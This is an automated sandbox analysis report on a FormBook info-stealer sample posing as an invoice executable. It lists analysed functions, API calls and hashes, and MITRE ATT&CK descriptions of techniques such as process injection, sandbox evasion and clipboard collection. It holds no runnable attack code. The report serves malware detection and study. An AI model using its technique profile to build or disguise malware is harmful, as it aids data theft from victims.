Uniqueness Score: -1.00%

Function 04CF9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF9A5A

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1825c609413d4bee6b279e8b396633f0eeb1f6c2bbad288aef788937d8e1e670
Instruction ID: d379fb3e59e3033a7fd8d906a1cc273950369e03d59b3d1d7f5c3676e56b7fc1
Opcode Fuzzy Hash: 1825c609413d4bee6b279e8b396633f0eeb1f6c2bbad288aef788937d8e1e670
Instruction Fuzzy Hash: DD90026121180046F20065A94C14B07001697D4347F51C116A0145668CC995D8A16565

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 102
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00AC6F88

Strings

wininet.dll, xrefs: 00AC6F3E, 00AC6F47
net.dll, xrefs: 00AC6F51, 00AC6FAF, 00AC6FBB

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 9f9dbf2defd18941274e92b9ded9deac65df316e64d11de6e68e6274d64eefbe
Instruction ID: b3f88dbe9a9b6347a8174479d977b28c8fe86dd5c54ae4c33554ceeb6bd1c451
Opcode Fuzzy Hash: 9f9dbf2defd18941274e92b9ded9deac65df316e64d11de6e68e6274d64eefbe
Instruction Fuzzy Hash: 203104B2506304ABD710DF68D9A1FABBBF8EB48700F14805DF61D5B241D770A905CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00AC6F88

Strings

wininet.dll, xrefs: 00AC6F3E, 00AC6F47
net.dll, xrefs: 00AC6F51, 00AC6FD7, 00AC6FAF, 00AC6FBB, 00AC6FE3

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 8fe69554f0aaca4b300acde52e6c82e5a517adc766a782ed3c70e5ca8a2f3a44
Instruction ID: 45c80842821345a74ca8cb3d26198f660121a73a0877f133dcfe25385c51f37c
Opcode Fuzzy Hash: 8fe69554f0aaca4b300acde52e6c82e5a517adc766a782ed3c70e5ca8a2f3a44
Instruction Fuzzy Hash: 5D3190B1601704ABD711DF68D8A1FA7B7F8BB88700F04841DF61A6B241D770A545CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AB3B93), ref: 00AC84FD

Strings

.z`, xrefs: 00AC84EC, 00AC84F8

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a5b5fa18591e9716e74df516f6b5548e1a8536e55fe5049fd6125af187a5e440
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 33E04FB12002046BD714DF59CC45EA777ACEF88750F014558FD0957241CA30F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB7260, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00AB72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00AB72DB

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: 9494681af91e4eb321a9c74ae13e0eb44b2b07c2bb0ce82047f1b00e59274be5
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: D601A231A803287AEB21A6949D43FFF776C9B41B50F154119FF04BA1C2E6E46A0687F6

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00AB9B92

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 407152badd00781be6fa86b4c028629821b938b25559ffa8dbc683e59cbfa4cb
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 92011EB5D0020DABDF10EBA4ED42FDEB7B89B54308F004199AA0897241F631EB14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC853D, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AC8594

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 3911d7bf898aec5609bbf92944835cf773665b0f790e25eab75ee1eaf24d1e25
Instruction ID: 56093a7b8e28ead42893d93999c3acc43f5c3c6599f68f03ef64f7b9f12fd3be
Opcode Fuzzy Hash: 3911d7bf898aec5609bbf92944835cf773665b0f790e25eab75ee1eaf24d1e25
Instruction Fuzzy Hash: AA0114B6208148AFCB04CF98DC90DEB3BBDAF8C310F158658FA5D97241C630E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC8540, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AC8594

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: c4305f4437e857e0d7fcba3e124b42f940e356e73460c0767234f8401896a68a
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 34015FB2214108ABCB54DF89DC81EEB77ADAF8C754F158258FA0D97251DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AC7010, Relevance: 1.5, APIs: 1, Instructions: 36
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00ABCCD0,?,?), ref: 00AC704C

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
Instruction ID: 7a678142cd48b5fb96e7514f8bab56a2fd4efd264e6f40ab5265bd1f25b040b5
Opcode Fuzzy Hash: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
Instruction Fuzzy Hash: 16E06D333902043AE63065A99C02FE7B39C8B81B21F5A002AFA0DEA2C1D595F90142A8

Uniqueness

Uniqueness Score: -1.00%

Function 00AC8621, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00ABCFA2,00ABCFA2,?,00000000,?,?), ref: 00AC8660

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 91871203f2c2a6b773c5229e29d5be06b7c18c066dadcddaa25a845df886b186
Instruction ID: 4dc4498af24fc318e2d39b583ffca7df4d4c5c32138fcf3ed3d5d85ac18559d5
Opcode Fuzzy Hash: 91871203f2c2a6b773c5229e29d5be06b7c18c066dadcddaa25a845df886b186
Instruction Fuzzy Hash: 03F0EDB1300214AFCB20DF68CC80FD77B68EF88210F05856CF9899B241DA30E811CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00AC8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00AC3516,?,00AC3C8F,00AC3C8F,?,00AC3516,?,?,?,?,?,00000000,00000000,?), ref: 00AC84BD

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 3762638af492a11579d97a5db6005a7559467d2f856f9b04d583d2e8d5eba371
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 03E012B1200208ABDB14EF99CC41EA777ACAF88650F118558FA095B282CA30F9108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00ABCFA2,00ABCFA2,?,00000000,?,?), ref: 00AC8660

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 354a0bb6a4a3bc81d8d1703e04a33f70a221a63d0a2539f7c5912d15a10f07e2
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 95E01AB12002086BDB10DF49CC85EE737ADAF88650F018554FA0957241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00ABD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00AB7C63,?), ref: 00ABD43B

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: abec3482b32fe345929b1afa459397782b98d2c619edb20f3e98674bac878207
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 35D0A7727603043BEA10FBA89C03F6632CC6B54B10F494074F94DD73C3E960F5004561

Uniqueness

Uniqueness Score: -1.00%

Function 00AC8504, Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00AB3B93), ref: 00AC84FD

Memory Dump Source

Source File: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ab0000_raserver.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5e50d24f3ca5e3eb7828cc0e5e1aa839f0ec67a65d9ed96a778c0f6568fece54
Instruction ID: 413b559542e6e70776c3ee4210d4aed28388c27bf89959f225db6a7011e1a792
Opcode Fuzzy Hash: 5e50d24f3ca5e3eb7828cc0e5e1aa839f0ec67a65d9ed96a778c0f6568fece54
Instruction Fuzzy Hash: 37C012721012119FC22AEBA4E881CF2B738FF863213260A9EE0894B800CA2594029AD0

Uniqueness

Uniqueness Score: -1.00%

Function 04CF967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF9694

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b3bb3c170e254b531d7708f50d8b1d761b4086cd2a5913ed0a9444e74e9a63e
Instruction ID: 4792072ce380278c5e7cb6c77a5ebb56cd8c2f9d03eab381a8a2940a3dd6d498
Opcode Fuzzy Hash: 8b3bb3c170e254b531d7708f50d8b1d761b4086cd2a5913ed0a9444e74e9a63e
Instruction Fuzzy Hash: 07B09BB19014C5C9FB51D7A14A087177A117BD4745F16C052D2020755A477CD1D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04D4FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04D4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04CFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04D45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04D45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04d4fdda
0x04d4fde2
0x04d4fde5
0x04d4fdec
0x04d4fdfa
0x04d4fdff
0x04d4fe0a
0x04d4fe0f
0x04d4fe17
0x04d4fe1e
0x04d4fe19
0x04d4fe19
0x04d4fe19
0x04d4fe20
0x04d4fe21
0x04d4fe22
0x04d4fe25
0x04d4fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D4FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D4FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D4FE2B

Memory Dump Source

Source File: 00000007.00000002.914455343.0000000004C90000.00000040.00000001.sdmp, Offset: 04C90000, based on PE: true

Associated: 00000007.00000002.914603296.0000000004DAB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.914611006.0000000004DAF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c90000_raserver.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: e4c708e659e84cd24e4c0e087fc3979df1c581a328a97d6751bba59a7aef4764
Instruction ID: 71306de57a56753ec233d096639040dc27a0d5db71d8c0651e81614f6ce064a3
Opcode Fuzzy Hash: e4c708e659e84cd24e4c0e087fc3979df1c581a328a97d6751bba59a7aef4764
Instruction Fuzzy Hash: EAF0F632240201BFE6201A45DC02F23BB5BEB84734F140324F728565E1EA62F93096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Proforma Invoice and Bank swift-REG.PI-0086547654.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 6F731A98, Relevance: 20.1, APIs: 13, Instructions: 591
stringlibrarymemoryCOMMONCrypto

Function 00406131, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405E88, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 00405E61, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004036AF, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Function 00402C72, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Function 00403043, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 6F7316DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON